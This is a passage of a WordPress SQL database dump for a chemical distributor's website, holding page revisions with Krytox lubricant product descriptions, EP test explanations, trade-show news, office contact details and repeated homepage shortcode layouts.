href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-27 13:09:00', '2016-09-27 13:09:00', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2021, 2, '2016-09-27 13:15:10', '2016-09-27 13:15:10', '', '283AD', '<p>Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</p><p>Krytox 283 Series contains 5% sodium nitrite.</p><p><img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" data-mce-src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg"></p>', 'inherit', 'closed', 'closed', '', '656-autosave-v1', '', '', '2016-09-27 13:15:10', '2016-09-27 13:15:10', '', 656, 'https://www.miller-stephenson.com/656-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2022, 2, '2016-09-27 13:16:12', '2016-09-27 13:16:12', '[row]\n\n[col span="3"]\n\n<h3>Upcoming Trade Shows</h3>\n\n[/col]\n[col span="6"]\n\n<p>ELECTRIC &amp; HYBRID VEHICLE TECHNOLOGY EXPO 2016</p>\n<p>Miller-Stephenson exhibited at the Electric & Hybrid show in Novi Michigan. It was a huge success as we learned new applications and grasped a better understanding of our customers needs. </p>\n<p>CAMX SHOW 2016</p>\n<p>Miller-Stephenson would like to invite you to visit us at the CAMX Show in Anaheim, California on September 27-29 Booth # C36. View all of our latest formulations! For a free pass, call us at (800) 992-2424.</p>\n\n[/col]\n[col span="3"]\n\n[ux_image id="50"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n<h3>Miller-Stephenson & Chemours Official Channel Partners</h3>\n\n[/col]\n[col span="6"]\n\n<p>As you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.</p>\n<p>Miller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.</p>\n<p>Chemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.</p>\n\n[/col]\n[col span="3"]\n\n[ux_image id="200"]\n\n\n[/col]\n\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-09-27 13:16:12', '2016-09-27 13:16:12', '', 118, 'https://www.miller-stephenson.com/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2024, 2, '2016-10-04 13:58:45', '2016-10-04 13:58:45', 'Krytox GPL 210 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 210 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \n\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \n\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\n\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.', 'GPL 210', 'Krytox GPL 210 has a Oil Viscosity of 5.5 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -70°C to 66°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '402-autosave-v1', '', '', '2016-10-04 13:58:45', '2016-10-04 13:58:45', '', 402, 'https://www.miller-stephenson.com/402-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2025, 3, '2016-09-27 16:33:14', '2016-09-27 16:33:14', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Global Offices</h3>\r\n<strong>Corporate Office</strong>\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n203.743.4447 / 800.442.3424\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\n<strong>Illinois</strong>\r\n6348 Oakton St.\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468\r\ne-mail: ilsales@mschem.com\r\n\r\n<strong>California</strong>\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\n<strong>Canada</strong>\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@mschem.com\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[map lat="41.373306" long="-73.492442" height="500px" color="#58728a" zoom="17"]\r\n\r\nMiller-Stephenson, Inc.\r\n55 Backus ave.\r\nDanbury, CT 06810-7328\r\n\r\n[/map]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-09-27 16:33:14', '2016-09-27 16:33:14', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2026, 2, '2016-09-27 16:39:58', '2016-09-27 16:39:58', '', 'GPL 212', 'Krytox GPL 202 has a Oil Viscosity of 15 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -63°C to 132°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '819-autosave-v1', '', '', '2016-09-27 16:39:58', '2016-09-27 16:39:58', '', 819, 'https://www.miller-stephenson.com/819-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2027, 2, '2016-09-27 16:44:34', '2016-09-27 16:44:34', '', 'GPL 215', 'Krytox GPL 215 has a Oil Viscosity of 160 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -36°C to 204°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '822-autosave-v1', '', '', '2016-09-27 16:44:34', '2016-09-27 16:44:34', '', 822, 'https://www.miller-stephenson.com/822-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2028, 1, '2016-09-27 16:48:24', '2016-09-27 16:48:24', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nWe offer an extensive product selection of "low global warming" products.\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 16:48:24', '2016-09-27 16:48:24', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2029, 1, '2016-09-27 16:51:06', '2016-09-27 16:51:06', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer an extensive product selection of "low global warming" (LGW)  products for many applications.\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 16:51:06', '2016-09-27 16:51:06', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2030, 1, '2016-09-27 16:51:47', '2016-09-27 16:51:47', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer an extensive product selection of "low global warming" (LGW)  products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-27 16:51:47', '2016-09-27 16:51:47', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2031, 0, '2016-09-27 16:52:07', '2016-09-27 16:52:07', '', '', '', 'publish', 'closed', 'closed', '', '2031', '', '', '2016-09-27 16:52:07', '2016-09-27 16:52:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/2031/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2032, 1, '2016-09-27 17:16:48', '2016-09-27 17:16:48', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" 